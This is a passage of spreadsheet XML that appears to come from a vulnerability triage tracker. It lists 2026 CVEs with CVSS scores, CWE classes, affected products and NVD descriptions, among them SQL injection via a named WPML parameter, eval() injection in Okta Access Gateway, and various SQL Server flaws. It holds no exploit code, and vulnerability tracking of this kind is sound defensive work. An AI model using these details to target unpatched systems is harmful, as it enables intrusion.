server block directive, resulting in execution of injected directives.</t></is></c><c r="T1062" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t></is></c></row><row r="1063"><c r="A1063" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1063" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1063" s="5" t="inlineStr"><is><t>CVE-2026-78550</t></is></c><c r="D1063" s="5" t="n"><v>6.6</v></c><c r="E1063" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1063" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1063" s="5" t="inlineStr" /><c r="H1063" s="5" t="n"><v>0.004</v></c><c r="I1063" s="5" t="inlineStr" /><c r="J1063" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1063" s="5" t="inlineStr" /><c r="L1063" s="5" t="inlineStr" /><c r="M1063" s="5" t="inlineStr" /><c r="N1063" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1063" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1063" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1063" s="5" t="inlineStr" /><c r="R1063" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S1063" s="5" t="inlineStr"><is><t>The Okta Access Gateway management console passes user-supplied input to eval() without sanitization during an authenticated administrator SSH session. As a result, the unsanitized input is executed directly, leading to code execution with the privileges of the management console.</t></is></c><c r="T1063" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t></is></c></row><row r="1064"><c r="A1064" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1064" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1064" s="5" t="inlineStr"><is><t>CVE-2026-17509</t></is></c><c r="D1064" s="5" t="n"><v>6.5</v></c><c r="E1064" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1064" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1064" s="5" t="inlineStr" /><c r="H1064" s="5" t="n"><v>0.002</v></c><c r="I1064" s="5" t="inlineStr" /><c r="J1064" s="5" t="inlineStr" /><c r="K1064" s="5" t="inlineStr" /><c r="L1064" s="5" t="inlineStr" /><c r="M1064" s="5" t="inlineStr" /><c r="N1064" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1064" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1064" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1064" s="5" t="inlineStr" /><c r="R1064" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1064" s="5" t="inlineStr"><is><t>The WPML Multilingual CMS plugin for WordPress is vulnerable to time-based SQL Injection via the ‘elementIds’ parameter in all versions up to, and including, 4.9.5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vulnerability is exploitable due to an authorization bypass where the registered authorization callback fails to execute, allowing any authenticated user regardless of role to access administrative translation functionalities.</t></is></c><c r="T1064" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17509</t></is></c></row><row r="1065"><c r="A1065" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1065" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1065" s="5" t="inlineStr"><is><t>CVE-2026-18021</t></is></c><c r="D1065" s="5" t="n"><v>6.5</v></c><c r="E1065" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1065" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1065" s="5" t="inlineStr" /><c r="H1065" s="5" t="n"><v>0.003</v></c><c r="I1065" s="5" t="inlineStr" /><c r="J1065" s="5" t="inlineStr" /><c r="K1065" s="5" t="inlineStr" /><c r="L1065" s="5" t="inlineStr" /><c r="M1065" s="5" t="inlineStr" /><c r="N1065" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1065" s="5" t="inlineStr" /><c r="R1065" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1065" s="5" t="inlineStr"><is><t>The The Beaver Builder Page Builder – Drag and Drop Website Builder plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.10.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.</t></is></c><c r="T1065" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18021</t></is></c></row><row r="1066"><c r="A1066" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1066" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1066" s="5" t="inlineStr"><is><t>CVE-2026-44766</t></is></c><c r="D1066" s="5" t="n"><v>6.5</v></c><c r="E1066" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1066" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1066" s="5" t="inlineStr" /><c r="H1066" s="5" t="n"><v>0.002</v></c><c r="I1066" s="5" t="inlineStr" /><c r="J1066" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1066" s="5" t="inlineStr" /><c r="L1066" s="5" t="inlineStr" /><c r="M1066" s="5" t="inlineStr" /><c r="N1066" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1066" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1066" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1066" s="5" t="inlineStr" /><c r="R1066" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1066" s="5" t="inlineStr"><is><t>SAP S/4HANA (Intercompany Matching and Reconciliation) allows a low-privileged authenticated user to inject malicious input into certain functions, which may be processed by the database without proper validation. This could allow the user to access sensitive information, resulting in high impact on confidentiality, with no impact on integrity and availability of the application.</t></is></c><c r="T1066" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t></is></c></row><row r="1067"><c r="A1067" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1067" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1067" s="5" t="inlineStr"><is><t>CVE-2026-53637</t></is></c><c r="D1067" s="5" t="n"><v>6.5</v></c><c r="E1067" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1067" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1067" s="5" t="inlineStr" /><c r="H1067" s="5" t="n"><v>0.003</v></c><c r="I1067" s="5" t="inlineStr" /><c r="J1067" s="5" t="inlineStr" /><c r="K1067" s="5" t="inlineStr" /><c r="L1067" s="5" t="inlineStr" /><c r="M1067" s="5" t="inlineStr" /><c r="N1067" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1067" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1067" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1067" s="5" t="inlineStr" /><c r="R1067" s="5" t="inlineStr"><is><t>CWE-672, CWE-841</t></is></c><c r="S1067" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Versions 2.0.0 through 2.0.17, 2.1.0 through 2.1.14, and 2.2.0 through 2.2.5 contain an improper workflow enforcement vulnerability in the cart `FormComponent`. When an order is completed while its cart page remains open, the stale LiveComponent does not detect the order’s changed state and continues to permit cart actions, allowing an authenticated customer to modify or permanently delete an already completed order. Versions 2.0.18, 2.1.15, and 2.2.6 contain a patch. As a workaround, deployments can copy the patched `FormComponent` into the application's `src/` directory and override the `sylius_shop.twig.component.cart.form` service definition to use that class.</t></is></c><c r="T1067" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53637</t></is></c></row><row r="1068"><c r="A1068" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1068" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1068" s="5" t="inlineStr"><is><t>CVE-2026-55256</t></is></c><c r="D1068" s="5" t="n"><v>6.5</v></c><c r="E1068" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1068" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1068" s="5" t="inlineStr" /><c r="H1068" s="5" t="n"><v>0.003</v></c><c r="I1068" s="5" t="inlineStr" /><c r="J1068" s="5" t="inlineStr" /><c r="K1068" s="5" t="inlineStr" /><c r="L1068" s="5" t="inlineStr" /><c r="M1068" s="5" t="inlineStr" /><c r="N1068" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1068" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1068" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1068" s="5" t="inlineStr" /><c r="R1068" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1068" s="5" t="inlineStr"><is><t>In parsePartHeaders of multiple files, there is a possible persistent denial of service due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1068" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55256</t></is></c></row><row r="1069"><c r="A1069" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1069" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1069" s="5" t="inlineStr"><is><t>CVE-2026-58649</t></is></c><c r="D1069" s="5" t="n"><v>6.5</v></c><c r="E1069" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1069" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1069" s="5" t="inlineStr" /><c r="H1069" s="5" t="n"><v>0.003</v></c><c r="I1069" s="5" t="inlineStr" /><c r="J1069" s="5" t="inlineStr" /><c r="K1069" s="5" t="inlineStr" /><c r="L1069" s="5" t="inlineStr" /><c r="M1069" s="5" t="inlineStr" /><c r="N1069" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1069" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1069" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1069" s="5" t="inlineStr" /><c r="R1069" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S1069" s="5" t="inlineStr"><is><t>Origin validation error in .NET allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1069" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58649</t></is></c></row><row r="1070"><c r="A1070" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1070" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1070" s="5" t="inlineStr"><is><t>CVE-2026-62437</t></is></c><c r="D1070" s="5" t="n"><v>6.5</v></c><c r="E1070" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1070" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1070" s="5" t="inlineStr" /><c r="H1070" s="5" t="n"><v>0.001</v></c><c r="I1070" s="5" t="inlineStr" /><c r="J1070" s="5" t="inlineStr" /><c r="K1070" s="5" t="inlineStr" /><c r="L1070" s="5" t="inlineStr" /><c r="M1070" s="5" t="inlineStr" /><c r="N1070" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1070" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1070" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1070" s="5" t="inlineStr" /><c r="R1070" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1070" s="5" t="inlineStr"><is><t>When guests are terminated, various pieces of cleanup need carrying out.
The cleaning up of PCI devices which were assigned to guests, and the
associated removal of tracking structures for IRQs used by the devices
occurs relatively early in the process.  Unfortunately after that point
the guest about to be terminated could cause its device model (DM) to
re-establish such tracking structures, by having it bind one or more IRQs
anew.  While some of those tracking structures would still be cleaned up
later on, at least one would not be.</t></is></c><c r="T1070" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62437</t></is></c></row><row r="1071"><c r="A1071" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1071" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1071" s="5" t="inlineStr"><is><t>CVE-2026-62762</t></is></c><c r="D1071" s="5" t="n"><v>6.5</v></c><c r="E1071" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1071" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1071" s="5" t="inlineStr" /><c r="H1071" s="5" t="n"><v>0.008</v></c><c r="I1071" s="5" t="inlineStr" /><c r="J1071" s="5" t="inlineStr" /><c r="K1071" s="5" t="inlineStr" /><c r="L1071" s="5" t="inlineStr" /><c r="M1071" s="5" t="inlineStr" /><c r="N1071" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1071" s="5" t="inlineStr" /><c r="R1071" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1071" s="5" t="inlineStr"><is><t>Null pointer dereference in Active Directory Domain Services allows an authorized attacker to deny service over a network.</t></is></c><c r="T1071" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62762</t></is></c></row><row r="1072"><c r="A1072" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1072" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1072" s="5" t="inlineStr"><is><t>CVE-2026-62801</t></is></c><c r="D1072" s="5" t="n"><v>6.5</v></c><c r="E1072" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1072" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1072" s="5" t="inlineStr" /><c r="H1072" s="5" t="n"><v>0.005</v></c><c r="I1072" s="5" t="inlineStr" /><c r="J1072" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K107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72" s="5" t="inlineStr" /><c r="M1072" s="5" t="inlineStr" /><c r="N1072" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1072" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1072" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1072" s="5" t="inlineStr" /><c r="R1072" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1072" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T1072" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t></is></c></row><row r="1073"><c r="A1073" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1073" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1073" s="5" t="inlineStr"><is><t>CVE-2026-64918</t></is></c><c r="D1073" s="5" t="n"><v>6.5</v></c><c r="E1073" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1073" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1073" s="5" t="inlineStr" /><c r="H1073" s="5" t="n"><v>0.005</v></c><c r="I1073" s="5" t="inlineStr" /><c r="J1073" s="5" t="inlineStr" /><c r="K1073" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1073" s="5" t="inlineStr" /><c r="M1073" s="5" t="inlineStr" /><c r="N1073" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1073" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1073" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1073" s="5" t="inlineStr" /><c r="R1073" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S1073" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Microsoft Office allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1073" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64918</t></is></c></row><row r="1074"><c r="A1074" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1074" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1074" s="5" t="inlineStr"><is><t>CVE-2026-66303</t></is></c><c r="D1074" s="5" t="n"><v>6.5</v></c><c r="E1074" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1074" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1074" s="5" t="inlineStr" /><c r="H1074" s="5" t="n"><v>0.008</v></c><c r="I1074" s="5" t="inlineStr" /><c r="J1074" s="5" t="inlineStr" /><c r="K1074" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1074" s="5" t="inlineStr" /><c r="M1074" s="5" t="inlineStr" /><c r="N1074" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1074" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1074" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1074" s="5" t="inlineStr" /><c r="R1074" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1074" s="5" t="inlineStr"><is><t>Null pointer dereference in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="T1074" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66303</t></is></c></row><row r="1075"><c r="A1075" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1075" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1075" s="5" t="inlineStr"><is><t>CVE-2026-66306</t></is></c><c r="D1075" s="5" t="n"><v>6.5</v></c><c r="E1075" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1075" s="5" t="inlineStr" /><c r="H1075" s="5" t="n"><v>0.005</v></c><c r="I1075" s="5" t="inlineStr" /><c r="J1075" s="5" t="inlineStr" /><c r="K1075" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1075" s="5" t="inlineStr" /><c r="M1075" s="5" t="inlineStr" /><c r="N1075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1075" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1075" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1075" s="5" t="inlineStr" /><c r="R1075" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1075" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1075" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66306</t></is></c></row><row r="1076"><c r="A1076" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1076" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1076" s="5" t="inlineStr"><is><t>CVE-2026-66308</t></is></c><c r="D1076" s="5" t="n"><v>6.5</v></c><c r="E1076" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1076" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1076" s="5" t="inlineStr" /><c r="H1076" s="5" t="n"><v>0.006</v></c><c r="I1076" s="5" t="inlineStr" /><c r="J1076" s="5" t="inlineStr" /><c r="K1076" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1076" s="5" t="inlineStr" /><c r="M1076" s="5" t="inlineStr" /><c r="N1076" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1076" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1076" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1076" s="5" t="inlineStr" /><c r="R1076" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1076" s="5" t="inlineStr"><is><t>Out-of-bounds read in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="T1076" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66308</t></is></c></row><row r="1077"><c r="A1077" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1077" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1077" s="5" t="inlineStr"><is><t>CVE-2026-66816</t></is></c><c r="D1077" s="5" t="n"><v>6.5</v></c><c r="E1077" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1077" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1077" s="5" t="inlineStr" /><c r="H1077" s="5" t="n"><v>0.007</v></c><c r="I1077" s="5" t="inlineStr" /><c r="J1077" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1077" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1077" s="5" t="inlineStr" /><c r="M1077" s="5" t="inlineStr" /><c r="N1077" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1077" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1077" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1077" s="5" t="inlineStr" /><c r="R1077" s="5" t="inlineStr"><is><t>CWE-778</t></is></c><c r="S1077" s="5" t="inlineStr"><is><t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t></is></c><c r="T1077" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t></is></c></row><row r="1078"><c r="A1078" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1078" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1078" s="5" t="inlineStr"><is><t>CVE-2026-67369</t></is></c><c r="D1078" s="5" t="n"><v>6.5</v></c><c r="E1078" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1078" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1078" s="5" t="inlineStr" /><c r="H1078" s="5" t="n"><v>0.007</v></c><c r="I1078" s="5" t="inlineStr" /><c r="J1078" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1078" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1078" s="5" t="inlineStr" /><c r="M1078" s="5" t="inlineStr" /><c r="N1078" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1078" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1078" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1078" s="5" t="inlineStr" /><c r="R1078" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1078" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1078" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t></is></c></row><row r="1079"><c r="A1079" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1079" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1079" s="5" t="inlineStr"><is><t>CVE-2026-67383</t></is></c><c r="D1079" s="5" t="n"><v>6.5</v></c><c r="E1079" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1079" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1079" s="5" t="inlineStr" /><c r="H1079" s="5" t="n"><v>0.01</v></c><c r="I1079" s="5" t="inlineStr" /><c r="J1079" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1079" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1079" s="5" t="inlineStr" /><c r="M1079" s="5" t="inlineStr" /><c r="N1079" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1079" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1079" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1079" s="5" t="inlineStr" /><c r="R1079" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1079" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1079" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t></is></c></row><row r="1080"><c r="A1080" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1080" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1080" s="5" t="inlineStr"><is><t>CVE-2026-67386</t></is></c><c r="D1080" s="5" t="n"><v>6.5</v></c><c r="E1080" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1080" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1080" s="5" t="inlineStr" /><c r="H1080" s="5" t="n"><v>0.007</v></c><c r="I1080" s="5" t="inlineStr" /><c r="J1080" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1080" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1080" s="5" t="inlineStr" /><c r="M1080" s="5" t="inlineStr" /><c r="N1080" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1080" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1080" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1080" s="5" t="inlineStr" /><c r="R1080" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1080" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1080" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t></is></c></row><row r="1081"><c r="A1081" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1081" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1081" s="5" t="inlineStr"><is><t>CVE-2026-67389</t></is></c><c r="D1081" s="5" t="n"><v>6.5</v></c><c r="E1081" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1081" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1081" s="5" t="inlineStr" /><c r="H1081" s="5" t="n"><v>0.007</v></c><c r="I1081" s="5" t="inlineStr" /><c r="J1081" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1081" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1081" s="5" t="inlineStr" /><c r="M1081" s="5" t="inlineStr" /><c r="N1081" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1081" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1081" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1081" s="5" t="inlineStr" /><c r="R1081" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1081" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1081" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67389</t></is></c></row><row r="1082"><c r="A1082" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1082" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1082" s="5" t="inlineStr"><is><t>CVE-2026-67390</t></is></c><c r="D1082" s="5" t="n"><v>6.5</v></c><c r="E1082" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1082" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1082" s="5" t="inlineStr" /><c r="H1082" s="5" t="n"><v>0.01</v></c><c r="I1082" s="5" t="inlineStr" /><c r="J1082" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1082" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1082" s="5" t="inlineStr" /><c r="M1082" s="5" t="inlineStr" /><c r="N1082" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1082" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1082" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1082" s="5" t="inlineStr" /><c r="R1082" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1082" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1082" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67390</t></is></c></row><row r="1083"><c r="A1083" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1083" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1083" s="5" t="inlineStr"><is><t>CVE-2026-67393</t></is></c><c r="D1083" s="5" t="n"><v>6.5</v></c><c r="E1083" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1083" s="5" 